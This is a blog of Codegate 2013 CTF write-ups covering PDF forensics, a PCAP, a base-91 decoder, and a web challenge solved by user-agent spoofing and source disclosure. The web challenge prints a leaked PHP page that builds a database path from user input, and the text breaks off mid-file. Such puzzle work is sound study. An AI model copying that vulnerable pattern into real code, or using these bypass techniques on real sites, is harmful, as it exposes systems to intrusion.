Monday, June 3, 2013

Codegate 2013 :: Misc #4 (300 points)

This was the 4th challenge under the misc category which was worth 300 points. A zipped file was provided for this challenge with the following hints:
authkey format :
[1st_key]_[2nd_key]_[3rd_key]
ex)
[a]_[b]_[c] -> wrong
a_b_c -> right
view raw codegate2013_misc4_1.txt hosted with ❤ by GitHub
The zipped file contained a single binary file with no extension. TrID was deployed to identify the extracted file based on its binary signature and was found to be a Adobe PDF file. The file was subsequently renamed with .pdf extension to view its contents using Adobe PDF Reader.

Only two words (! Confidential Documents !) were displayed when the PDF file was viewed with Adobe PDF Reader. More efforts were required to look further into the PDF specification which encapsulated a complete description of the fixed-layout flat document, including the text, fonts, graphics, and other information needed to display it. 

The 1st key was found very easily within object 12. 1st_key(nn@LiC!oU$)
12 0 obj
<<
/Title(Confidential Documents) /Author(RExVuz) /Subject(CODEGATE2013 YUT Challenge) /Keywords(PDF, Miscellanea) /CreationDate(D:20130301210000+0900) /ModDate(D:20130303090000+0900) /1st_key(nn@LiC!oU$) /Producer(CODEGATE PDF Maker 2013) /Creator(CODEGATE PDF Maker 2013)
>>
endobj
view raw codegate2013_misc4_2.txt hosted with ❤ by GitHub

Hints for the 2nd key were discovered within object 5.
2nd_key is combination of strings in three objects; strlen(2nd_key) == 14;
view raw codegate2013_misc4_3.txt hosted with ❤ by GitHub

Hint #1 mentioned the 2nd key is made up of strings contained in three objects. Hint #2 stated the length of the 2nd key is 14. After scanning through the PDF specification, objects 6, 7, and 8 were found to be likely to contain text strings. The following line was amended to replace the digit 5 with 6, 7, and 8, to display contents of each of the objects in turn.
/Contents 5 0 R
view raw codegate2013_misc4_4.txt hosted with ❤ by GitHub

Object 6 :: PpPDdD[
6 0 obj
<< /Length 66 >>
stream
BT /F1 99 Tf 1 0 0 1 1 715 Tm<50
7
0
50
446
44
4
5
B>Tj ET
endstream
endobj
view raw codegate2013_misc4_5.txt hosted with ❤ by GitHub

Object 7 :: F_F
7 0 obj
<< /Length 46 >>
stream
BT /F1 99 Tf 1 0 0 1 1 715 Tm(\106_\106) Tj ET
endstream
endobj
view raw codegate2013_misc4_6.txt hosted with ❤ by GitHub

Object 8 :: ]ile
8 0 obj
<< /Length 71 >>
stream
BT /F1 99 Tf 1 0 0 1 1 715 Tm(\
]\
\
i\
\
\
l\
\
\
\
e\
\
\
\
\
) Tj ET
endstream
endobj
view raw codegate2013_misc4_7.txt hosted with ❤ by GitHub

With the above strings concatenated, the 2nd_key was obtained! (PpPDdD[F_F]ile) strlen = 14


Careful examination of the data stream within object 11 was needed for the 3rd key. 1101 bytes of data were extracted and saved to a new binary file. The data were then uncompressed using PHP gzuncompress(), displayed, and found to be another PDF file.

PHP Script:
<?php
$filename = "binaryfile";
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
$uncompressed = gzuncompress($contents);
echo $uncompressed;
?>
view raw codegate2013_misc4_8.php hosted with ❤ by GitHub

PDF Specification:
%PDF-1.3
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 7 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 69 >>
stream
BT /F1 1 Tf 300 400 Td 15 TL (673B672B3E663C666F2B37390D362061) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
7 0 obj
<<
/Type /Action
/S /JavaScript
/JS (this.zoom=1337;lave=eval;epacsenu=unescape;cipher="171F0D26222B20313716";myFunc="function C0D3G4T3(){HaCkInG=Math.PI;dEfEnSe=parseInt;O3o121oO=dEfEnSe(~((HaCkInG&HaCkInG)|(~HaCkInG&HaCkInG)&(HaCkInG&~HaCkInG)|(~HaCkInG&~HaCkInG)));O3o309oO=dEfEnSe(((O3o121oO&O3o121oO)|(~O3o121oO&O3o121oO)&(O3o121oO&~O3o121oO)|(~O3o121oO&~O3o121oO))&1);/*Encrypt By yut.codegate.org's CGXX 0.13 YUT*/SECUrity='length';LuCkY7=31337-01337-9197-0xD15E;for(KangNam=O3o121oO;KangNam<myFunc[SECUrity];KangNam-=-O3o309oO)LuCkY7+=myFunc.charCodeAt(KangNam)^myFunc.length;YUTNORI=LuCkY7>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1;zuvxer='';h4ck3r=String[epacsenu('%6'+'6%72%'+'6F%6D%4'+'3%68%61'+'%72%4'+'3%6F%64'+'%65')];for(COEX=O3o121oO;COEX<cipher[SECUrity];COEX++,COEX++)zuvxer+=h4ck3r(dEfEnSe(O3o121oO+epacsenu('x')+cipher.charAt(COEX)+cipher.charAt(COEX+dEfEnSe(O3o309oO)))^YUTNORI);app.alert(zuvxer.split('').reverse().join(''));}lave('C0D3G4T3();')";lastFunc=lave(lave);lastFunc(myFunc);)
>>
endobj
8 0 obj
<<
/Title(Confidential Documents) /Author(RExVuz) /Subject(CODEGATE2013 YUT Challenge) /Keywords(PDF, Miscellanea) /CreationDate(D:20130301210000+0900) /ModDate(D:20130303090000+0900) /Producer(CODEGATE PDF Maker 2013) /Creator(CODEGATE PDF Maker 2013)
>>
endobj
xref
0 9
0000000000 65535 f
0000000012 00000 n
0000000109 00000 n
0000000165 00000 n
0000000234 00000 n
0000000439 00000 n
0000000566 00000 n
0000000690 00000 n
0000001726 00000 n
trailer
<<
/Size 9
/Root 1 0 R /Info 8 0 R
>>
startxref
2005
%%EOF
view raw codegate2013_misc4_9.txt hosted with ❤ by GitHub

The next lead came from the Javascript contained within object 7. Some modifications were made to the script in order to view the alert which read “Decrypt_ME“. The cipher was then changed to “673B672B3E663C666F2B37390D362061″, a string contained within the extracted PDF specification, and the 3rd key was revealed. 3rd_key=4n4ly5i5

HTML with Javascript:
<html>
<head>
<script>
this.zoom = 1337;
lave = eval;
epacsenu = unescape;
cipher = "673B672B3E663C666F2B37390D362061";
myFunc = "function C0D3G4T3(){HaCkInG=Math.PI;dEfEnSe=parseInt;O3o121oO=dEfEnSe(~((HaCkInG&HaCkInG)|(~HaCkInG&HaCkInG)&(HaCkInG&~HaCkInG)|(~HaCkInG&~HaCkInG)));O3o309oO=dEfEnSe(((O3o121oO&O3o121oO)|(~O3o121oO&O3o121oO)&(O3o121oO&~O3o121oO)|(~O3o121oO&~O3o121oO))&1);/*Encrypt By yut.codegate.org's CGXX 0.13 YUT*/SECUrity='length';LuCkY7=31337-01337-9197-0xD15E;for(KangNam=O3o121oO;KangNam<myFunc[SECUrity];KangNam-=-O3o309oO)LuCkY7+=myFunc.charCodeAt(KangNam)^myFunc.length;YUTNORI=LuCkY7>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1>>1;zuvxer='';h4ck3r=String[epacsenu('%6'+'6%72%'+'6F%6D%4'+'3%68%61'+'%72%4'+'3%6F%64'+'%65')];for(COEX=O3o121oO;COEX<cipher[SECUrity];COEX++,COEX++)zuvxer+=h4ck3r(dEfEnSe(O3o121oO+epacsenu('x')+cipher.charAt(COEX)+cipher.charAt(COEX+dEfEnSe(O3o309oO)))^YUTNORI);app.alert(zuvxer.split('').reverse().join(''));}lave('C0D3G4T3();')";
//lastFunc = lave(lave);
//lastFunc(myFunc);
function C0D3G4T3() {
HaCkInG = Math.PI;
dEfEnSe = parseInt;
O3o121oO = dEfEnSe(~((HaCkInG & HaCkInG) | (~HaCkInG & HaCkInG) & (HaCkInG & ~HaCkInG) | (~HaCkInG & ~HaCkInG)));
O3o309oO = dEfEnSe(((O3o121oO & O3o121oO) | (~O3o121oO & O3o121oO) & (O3o121oO & ~O3o121oO) | (~O3o121oO & ~O3o121oO)) & 1); /*Encrypt By yut.codegate.org's CGXX 0.13 YUT*/
SECUrity = 'length';
LuCkY7 = 31337 - 01337 - 9197 - 0xD15E;
for (KangNam = O3o121oO; KangNam < myFunc[SECUrity]; KangNam -= -O3o309oO) LuCkY7 += myFunc.charCodeAt(KangNam) ^ myFunc.length;
YUTNORI = LuCkY7 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1 >> 1;
zuvxer = '';
h4ck3r = String[epacsenu('%6' + '6%72%' + '6F%6D%4' + '3%68%61' + '%72%4' + '3%6F%64' + '%65')];
for (COEX = O3o121oO; COEX < cipher[SECUrity]; COEX++, COEX++) zuvxer += h4ck3r(dEfEnSe(O3o121oO + epacsenu('x') + cipher.charAt(COEX) + cipher.charAt(COEX + dEfEnSe(O3o309oO))) ^ YUTNORI);
alert(zuvxer.split('').reverse().join(''));
}
lave('C0D3G4T3();')
</script>
</head>
<body onload="C0D3G4T3()">
</body>
</html>
view raw codegate2013_misc4_10.html hosted with ❤ by GitHub

Captured the flag with the 3 keys combined! 300 points in the bag!! Yay!!!
Flag: nn@LiC!oU$_PpPDdD[F_F]ile_4n4ly5i5

Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Codegate 2013 :: Misc #3 (200 points)

The 3rd challenge under the Misc category, with a reward of 200 points, got underway with a binary that was identified as a “Wireshark PCAP Next Generation Dump File Format (Little Endian)” file by TrID.

2 hints were given for this challenge:
  1. [Misc3(200) Hint] You can solve the question off-line.
  2. [Misc3(200) Hint] Find out document.
The objective was to find the document in question from the 7161 captured network packets. Thankfully, generating the list of HTTP objects (File > Export Objects > HTTP) and saving them to a local directory was a breeze with Wireshark, and a total of 59 files were exported for analysis.

Sample list of files exported:

When the above selected file was viewed in Adobe PDF Reader, it showed the official rules for Codegate YUT Challenge. However on closer examination in notepad, the PDF specification revealed the file had several incremental updates contained therein, evident by the presence of several “%%EOF” and updated objects content. The key was revealed after the last update was deleted from the PDF specification. Flag captured! 200 points in the bag!! Yay!!!


Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Codegate 2013 :: Misc #2 (200 points)

This was the second challenge under the misc category which was worth 200 points. Two files were provided, an encoded key and a source php file. The challenge was to write a decoder function to decode the encoded key.

Contents of source.php:
<?
function encode( $input )
{
$enc_tab = array(
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '!', '#', '$',
'%', '&', '(', ')', '*', '+', ',', '.', '/', ':', ';', '<', '=',
'>', '?', '@', '[', ']', '^', '_', '`', '{', '|', '}', '~', '"'
);
for( $index = 0 ; $index < strlen($input) ; $index++ ) {
$var1 |= ord($input{$index}) << $var2; $var2 += 8;
if( $var2 > 13 ) {
$var3 = $var1 & 8191;
if( $var3 > 88 ) { $var1 >>= 13; $var2 -= 13; }
else { $var3 = $var1 & 16383; $var1 >>= 14; $var2 -= 14; }
$output .= $enc_tab[$var3 % 91] . $enc_tab[$var3 / 91];
}
}
if( $var2 ) {
$output .= $enc_tab[$var1 % 91];
if( $var2 > 7 || $var1 > 90 ) $output .= $enc_tab[$var1 / 91];
}
return $output;
}
?>
view raw codegate2013_misc2_1.php hosted with ❤ by GitHub
Several points were gathered from the encoder function:
  1. $enc_tab, an array, comprised of 91 items.
  2. $var1 contained the (shifted) ASCII value of the input character being processed.
  3. $var2 contained the number of bits to be processed.
  4. $var3 contained the working value of $var1.
  5. If $var1 was between 89 and 8191, and $var2 was more than 13, its value would be shifted right by 13 places, otherwise its value would be shifted right by 14 places. 2 characters would be picked from $enc_tab based on the quotient and remainder from the division operation.
With these points in mind, the decoder function was written to be:
<?php
function decode($data) {
$enc_tab = array(
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '!', '#', '$',
'%', '&', '(', ')', '*', '+', ',', '.', '/', ':', ';', '<', '=',
'>', '?', '@', '[', ']', '^', '_', '`', '{', '|', '}', '~', '"'
);
$var1 = $var2 = $var3 = 0;
$output = "";
for ( $i = 0; $i < strlen($data); $i += 2 ) {
$char1 = -1;
for ( $j = 0; $j < count($enc_tab); $j++ ) {
if ( $enc_tab[$j] == $data{$i} ) {
$char1 = $j;
break;
}
}
if ( $char1 == -1 ) continue; // Ignore ASCII CR+LF ('\r\n', 0x0D 0x0A)
for ( $k = 0; $k < count($enc_tab); $k++ ) {
if ( $enc_tab[$k] == $data{$i+1} ) {
$char2 = $k;
break;
}
}
$var3 = $char1 + $char2 * 91;
$shift = $var2;
$var2 += ( ($var3 & 8191) > 88 ) ? 13 : 14;
$var1 |= ( $var3 << $shift );
while ($var2 > 8) {
$var2 -= 8;
$output .= chr( $var1 & 255 );
$var1 >>= 8;
}
}
return $output;
}
$filename = "encoded.key";
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
echo decode($contents);
?>
view raw codegate2013_misc2_2.php hosted with ❤ by GitHub
Flag captured! 200 points in the bag!! Yay!!!


Cheers,
Braeburn Ladny
Posted by at No comments:
Labels: ,

Codegate 2013 :: Web #5 (500 points)

This was the fifth challenge under the web category which was worth 500 points. The challenge kicked off with a note that read “connect with mobile”. Connecting to the website with a stock desktop browser showed the following “mobile only” text.


In came the User Agent Switcher browser extension that switched the user agent to “iPhone 4″, deceived this restriction and gained access to the site. Oh yea!


The site was actually a game simulator where you could create your own character by giving it a name. Each character started off with 150 points to be assigned to its 3 attributes (strength, dexterity and intelligence) depending on your preference. I named my character “wolf”.


Examination of the source code revealed two Javascripts and one of them (main.js) contained obfuscated code.

Contents of main.js:
var _0x5291=["\x3D\x73\x54\x4B\x70\x55\x47\x63\x68\x4E\x32\x63\x6C\x39\x46\x4B\x6C\x42\x58\x59\x6A\x4E\x58\x5A\x75\x56\x48\x4B\x6C\x52\x58\x61\x79\x64\x6E\x4C\x30\x35\x57\x5A\x74\x56\x33\x59\x76\x52\x32\x4F\x70\x6B\x55\x53\x77\x38\x46\x4B\x6B\x78\x57\x61\x6F\x4E\x45\x5A\x75\x56\x47\x63\x77\x46\x6D\x4C\x77\x77\x57\x4D\x66\x70\x77\x4F\x64\x42\x7A\x57\x70\x63\x43\x5A\x68\x56\x47\x61\x6E\x67\x53\x5A\x74\x46\x6D\x54\x6E\x46\x47\x56\x35\x4A\x30\x63\x30\x35\x57\x5A\x74\x56\x47\x62\x46\x52\x58\x5A\x6E\x35\x43\x64\x75\x56\x57\x62\x31\x4E\x32\x62\x6B\x42\x53\x50\x67\x41\x44\x62\x78\x38\x46\x49\x79\x46\x6D\x64\x4B\x73\x54\x4B\x4D\x4A\x56\x56\x75\x51\x6E\x62\x6C\x31\x57\x64\x6A\x39\x47\x5A\x6F\x51\x6E\x62\x6C\x35\x32\x62\x77\x31\x32\x62\x44\x6C\x6B\x55\x56\x56\x47\x5A\x76\x4E\x6D\x62\x6C\x74\x79\x4A\x39\x77\x6D\x63\x31\x5A\x79\x4A\x72\x6B\x69\x63\x6C\x4A\x6E\x63\x6C\x5A\x57\x5A\x79\x35\x43\x64\x75\x56\x57\x62\x31\x4E\x32\x62\x6B\x68\x43\x64\x75\x56\x6D\x62\x76\x42\x58\x62\x76\x4E\x55\x53\x53\x56\x56\x5A\x6B\x39\x32\x59\x75\x56\x32\x4B\x6E\x30\x6A\x5A\x6C\x4A\x6E\x4A\x6E\x73\x79\x4A\x72\x39\x57\x50\x6A\x4A\x33\x63\x30\x56\x32\x5A\x2F\x38\x53\x62\x76\x4E\x6D\x4C\x30\x42\x58\x61\x79\x4E\x32\x63\x68\x5A\x58\x59\x71\x4A\x33\x62\x30\x46\x32\x59\x7A\x56\x6E\x5A\x69\x39\x6D\x4C\x70\x42\x58\x59\x76\x38\x69\x4F\x77\x52\x48\x64\x6F\x64\x43\x49\x39\x41\x79\x59\x79\x4E\x6E\x4C\x4A\x6C\x45\x4D\x66\x70\x77\x4F\x70\x63\x43\x64\x77\x6C\x6D\x63\x6A\x4E\x33\x4A\x6F\x51\x6E\x62\x6C\x31\x57\x5A\x73\x56\x55\x5A\x30\x46\x57\x5A\x79\x4E\x6D\x4C\x30\x35\x57\x5A\x74\x56\x33\x59\x76\x52\x47\x49\x39\x41\x53\x53\x4A\x42\x7A\x58\x67\x49\x58\x59\x32\x74\x7A\x4A\x46\x4E\x54\x4A\x30\x42\x58\x61\x79\x4E\x32\x63\x76\x4D\x30\x4D\x6C\x51\x30\x4E\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x6B\x6A\x4D\x6C\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x73\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6B\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6F\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x41\x6A\x4D\x6C\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6A\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x51\x79\x49\x54\x4A\x72\x55\x32\x5A\x68\x42\x48\x4F\x79\x55\x53\x4D\x42\x68\x30\x55\x6A\x78\x57\x59\x6A\x74\x69\x4D\x79\x55\x43\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x7A\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x4E\x79\x55\x69\x4D\x79\x55\x79\x4B\x6C\x64\x57\x59\x77\x74\x69\x4D\x79\x55\x43\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x52\x7A\x55\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x77\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x41\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x65\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6B\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x43\x52\x7A\x55\x69\x5A\x6C\x4A\x48\x61\x75\x34\x32\x62\x70\x52\x58\x59\x6A\x39\x47\x62\x75\x63\x33\x62\x6B\x35\x57\x61\x33\x6C\x44\x4D\x6C\x45\x45\x4D\x6C\x51\x30\x4E\x6C\x6B\x44\x4D\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x73\x57\x59\x6C\x4A\x6E\x59\x77\x49\x54\x4A\x43\x4E\x54\x4A\x79\x49\x54\x4A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x77\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x74\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x5A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x45\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x58\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x51\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x5A\x79\x49\x54\x4A\x45\x4E\x54\x4A\x6C\x64\x57\x59\x77\x42\x6A\x4D\x6C\x45\x30\x4D\x6C\x41\x6A\x4D\x6C\x4D\x44\x4D\x79\x55\x53\x5A\x7A\x46\x32\x59\x35\x41\x54\x4A\x35\x41\x54\x4A\x42\x42\x54\x4A\x43\x4E\x54\x4A\x72\x46\x57\x5A\x79\x4A\x47\x4D\x79\x55\x69\x51\x7A\x55\x69\x4D\x79\x55\x43\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x34\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x59\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x55\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6B\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x79\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x49\x6E\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x69\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x6B\x6D\x4D\x79\x55\x43\x52\x7A\x55\x53\x5A\x6E\x46\x47\x63\x77\x49\x54\x4A\x42\x4E\x54\x4A\x77\x49\x54\x4A\x79\x41\x6A\x4D\x6C\x55\x32\x63\x68\x4E\x57\x4F\x77\x55\x53\x4F\x77\x55\x53\x51\x77\x55\x69\x51\x7A\x55\x79\x61\x68\x56\x6D\x63\x69\x42\x6A\x4D\x6C\x49\x30\x4D\x6C\x49\x6A\x4D\x6C\x77\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x74\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x64\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x67\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x75\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x5A\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x76\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x45\x4E\x54\x4A\x6C\x64\x57\x59\x77\x42\x6A\x4D\x6C\x45\x30\x4D\x6C\x41\x6A\x4D\x6C\x45\x44\x4D\x79\x55\x53\x5A\x7A\x46\x32\x59\x35\x41\x54\x4A\x35\x41\x54\x4A\x42\x42\x54\x4A\x43\x64\x54\x4A\x77\x49\x54\x4A\x35\x49\x54\x4A\x77\x68\x6A\x4D\x6C\x41\x6A\x4D\x6C\x67\x32\x59\x30\x6C\x32\x64\x7A\x6C\x44\x4D\x6C\x45\x45\x4D\x6C\x49\x30\x4D\x6C\x49\x6A\x4D\x6C\x49\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x30\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x30\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x43\x61\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x34\x69\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6C\x4A\x6A\x4D\x6C\x73\x69\x4D\x79\x55\x53\x62\x79\x49\x54\x4A\x72\x49\x6A\x4D\x6C\x38\x6D\x4D\x79\x55\x79\x4B\x79\x49\x54\x4A\x6F\x4A\x6A\x4D\x6C\x41\x6A\x4D\x6C\x51\x30\x4D\x6C\x41\x6A\x4D\x6C\x55\x32\x5A\x68\x42\x48\x4D\x79\x55\x69\x63\x68\x5A\x58\x4F\x77\x55\x53\x51\x77\x55\x69\x51\x33\x55\x53\x4F\x79\x55\x43\x63\x34\x49\x54\x4A\x6C\x64\x57\x59\x77\x39\x46\x5A\x68\x39\x47\x62\x77\x49\x54\x4A\x75\x39\x57\x61\x30\x4E\x6D\x62\x31\x5A\x57\x52\x7A\x55\x43\x64\x77\x6C\x6D\x63\x6A\x4E\x33\x51\x7A\x55\x79\x4A\x39\x55\x47\x63\x68\x4E\x32\x63\x6C\x39\x46\x49\x79\x46\x6D\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];var lO1=_0x5291[0];var _0x84de=[_0x5291[1],_0x5291[2],_0x5291[3],_0x5291[4],_0x5291[5],_0x5291[6]];function OO1(_0xc565x4){var _0xc565x5=_0x84de[0];var _0xc565x6,_0xc565x7,_0xc565x8,_0xc565x9,_0xc565xa,_0xc565xb,_0xc565xc,_0xc565xd,_0xc565xe=0,_0xc565xf=_0x84de[1];do{_0xc565x9=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xa=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xb=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xc=_0xc565x5[_0x84de[3]](_0xc565x4[_0x84de[2]](_0xc565xe++));_0xc565xd=_0xc565x9<<18|_0xc565xa<<12|_0xc565xb<<6|_0xc565xc;_0xc565x6=_0xc565xd>>16&0xff;_0xc565x7=_0xc565xd>>8&0xff;_0xc565x8=_0xc565xd&0xff;if(_0xc565xb==64){_0xc565xf+=String[_0x84de[4]](_0xc565x6);} else {if(_0xc565xc==64){_0xc565xf+=String[_0x84de[4]](_0xc565x6,_0xc565x7);} else {_0xc565xf+=String[_0x84de[4]](_0xc565x6,_0xc565x7,_0xc565x8);} ;} ;} while(_0xc565xe<_0xc565x4[_0x84de[5]]);;return _0xc565xf;} ;function _0OO(_0xc565x11){var _0xc565x12=_0x84de[1],_0xc565xe=0;for(_0xc565xe=_0xc565x11[_0x84de[5]]-1;_0xc565xe>=0;_0xc565xe--){_0xc565x12+=_0xc565x11[_0x84de[2]](_0xc565xe);} ;return _0xc565x12;} ;eval(OO1(_0OO(lO1)));
view raw codegate2013_web5_1.js hosted with ❤ by GitHub

The obfuscated code was easily deobfuscated by http://jsbeautifier.org/ :)

Line 18 of the above code revealed how URLs for each of the 3 pages (home.html, introduce.html, get_tag.html) were formed. The magic embedded within index.php produced wonders when the script was fed with those parameters – the source code was displayed on the screen! Repeated this step for the php pages (simulator.php, simulator_ok.php) and gathered several valuable hints to this challenge.

Contents of simulator.php:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Dot Mobi - free mobile website template by mobifreaks</title>
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=no" />
<script src="sha1.js"></script><script src="main.js"></script>
<link href="style.css" rel="stylesheet" type="text/css" media="all"/>
</head>
<body>
<?php
session_start();
if (!isset($_SESSION['scrap']) && !isset($_POST['name'])) die("scrap name is empty..");
if ($_POST['name'] == "GM") die("you can not view&amp;save with 'GM'");
if (isset($_POST['name'])) $_SESSION['scrap']=$_POST['name'];
$db = sqlite_open("/var/game_db/gamesim_".$_SESSION['scrap'].".db");
$row = sqlite_fetch_array(sqlite_query($db,"select 1 from sqlite_master"));
if (isset($row[0])) {
$row = sqlite_fetch_array(sqlite_query($db,"select * from status left join memo on status.time = memo.time order by status.time desc limit 1;"));
}
?><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Dot Mobi - free mobile website template by mobifreaks</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<link href="style.css" rel="stylesheet" type="text/css" media="all"/>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
<script type="text/javascript">
var point=150;
$(document).ready(function(){
$('input[value=-]').click(function(){var $x=$(this).parent().parent().find('td[id]');if(parseInt($x.html())>0){$x.html(parseInt($x.html())-1);point+=1;}viewpoint();});
